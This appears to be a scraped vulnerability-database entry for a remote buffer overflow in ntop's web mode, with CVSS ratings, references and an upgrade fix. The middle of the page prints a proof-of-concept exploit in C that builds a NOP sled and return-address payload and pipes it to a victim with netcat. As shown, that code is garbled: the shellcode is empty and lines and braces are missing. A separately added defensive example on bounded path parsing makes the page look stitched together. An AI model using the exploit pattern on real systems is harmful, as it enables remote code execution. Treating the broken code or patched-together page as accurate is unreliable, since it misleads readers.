Published: 2000-10-20 00:00:00
Revised: 2008-09-10 15:05:40

[Original] Buffer overflows in ntop running in web mode allow remote attackers to execute arbitrary commands.



- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(VENDOR_ADVISORY)  DEBIAN  20000830 ntop: Still remotely exploitable using buffer overflows

- Vulnerability information

Critical: buffer overflow
2000-10-20 00:00:00 2005-05-02 00:00:00

- Advisories and patches


- Vulnerability information (20150)

Luca Deri ntop 1.2 a7-9/1.3.1 Buffer Overflow Vulnerability (EDBID:20150)
unix remote
2000-08-14 Verified
0 Anonymous
N/A

ntop is a network usage monitoring tool for Unix systems. It can be invoked at the console or as a server daemon, presenting statistics via HTTP when started with the -w parameter. In this mode, it is vulnerable to a buffer overflow that is reachable before the connecting user has been authenticated. If exploited, an attacker can gain remote access to the system with the privileges ntop is executing with.

It is interesting to note that setuid ntop drops privileges before this can be exploited, but on *BSD systems it is installed executable only by members of group wheel. This leads to the assumption that it may often be executed as root (since users in wheel typically have root access), so despite the fact that it drops privileges, it can still yield remote root access for the attacker if exploited while running as root.

#include <stdio.h>
#include <string.h>

char shellcode[] =

void usage()
 printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
 printf("                       \n");
 printf("Usage : ./ntop-w-exp | nc victim port\n");

void main( int argc, char *argv[] )
  int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
  char code_buf[CODE_LEN];
  unsigned long esp=0xbedffb00;

  if(argc >= 2) offset = atoi(argv[1]);

  memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
  memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
     *(long *)&code_buf[i]=(unsigned long)esp-offset;

  printf("GET /");
  for(i=0;i<CODE_LEN; i++)

- Vulnerability information

ntop -w Option Filename Buffer Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- Vulnerability description

A remote overflow exists in ntop when running in 'web server' (-w) mode. The program fails to validate input to the filename variable resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.
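The defect class described in the two descriptions above (an HTTP request path copied into a fixed-size filename buffer with no length check, reachable before authentication) is illustrated below with an added C example. This is not ntop's source; the 64-byte buffer, the function names and the constructed requests are assumptions made for the illustration. The unbounded variant is shown beside a bounded one that rejects over-long paths.

```c
/* Added illustration (not ntop's source): a toy HTTP GET handler showing an
 * unbounded copy of the request path into a fixed-size filename buffer,
 * beside a bounded version that rejects over-long paths. Buffer size and
 * function names are assumptions. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define FILENAME_CAP 64  /* assumed fixed-size filename buffer */

/* Length of the request path: bytes after "GET " up to the first space or
 * line end. Returns 0 for a request that does not start with "GET ". */
size_t request_path_length(const char *request) {
    if (strncmp(request, "GET ", 4) != 0) return 0;
    return strcspn(request + 4, " \r\n");
}

/* Vulnerable pattern: no check that the path fits the caller's buffer.
 * An attacker-controlled path longer than the buffer overruns it, and this
 * runs before any authentication. Only called with short input below. */
void parse_get_path_unbounded(const char *request, char *filename) {
    size_t len = request_path_length(request);
    memcpy(filename, request + 4, len);   /* overruns if len >= buffer size */
    filename[len] = '\0';
}

/* Hardened version: the destination capacity is part of the interface, and an
 * over-long or malformed request is rejected rather than silently truncated. */
int parse_get_path_bounded(const char *request, char *filename, size_t cap) {
    if (strncmp(request, "GET ", 4) != 0) return -1;
    size_t len = strcspn(request + 4, " \r\n");
    if (len == 0 || len >= cap) return -1;  /* keep room for the terminator */
    memcpy(filename, request + 4, len);
    filename[len] = '\0';
    return 0;
}

/* Build a constructed over-long request: "GET /" + n 'A's + " HTTP/1.0".
 * Returns the number of bytes written (excluding the terminator), 0 if it
 * does not fit in out. */
size_t build_long_request(char *out, size_t out_cap, size_t n) {
    const char *prefix = "GET /";
    const char *suffix = " HTTP/1.0";
    size_t need = strlen(prefix) + n + strlen(suffix);
    if (need + 1 > out_cap) return 0;
    strcpy(out, prefix);
    memset(out + strlen(prefix), 'A', n);
    strcpy(out + strlen(prefix) + n, suffix);
    return need;
}

int main(void) {
    char filename[FILENAME_CAP];
    char request[512];

    /* Constructed benign request: fits either parser. */
    if (parse_get_path_bounded("GET /index.html HTTP/1.0", filename, sizeof filename) == 0)
        printf("accepted: %s\n", filename);

    /* Constructed over-long path: the bounded parser refuses it; the
     * unbounded one would have written past the 64-byte buffer. */
    build_long_request(request, sizeof request, 200);
    printf("path length %zu, bounded parser returns %d\n",
           request_path_length(request),
           parse_get_path_bounded(request, filename, sizeof filename));
    return 0;
}
```

The point for a reviewer is where the check lives: because the request is parsed before any credential check, the length validation has to be in the parser itself, not behind authentication, and rejecting (returning an error) is preferable to truncating, which can turn one filename into another.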

- Timeline

2000-10-25 2000-08-14
2000-10-25 Unknown

- Solution

Upgrade to version 2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author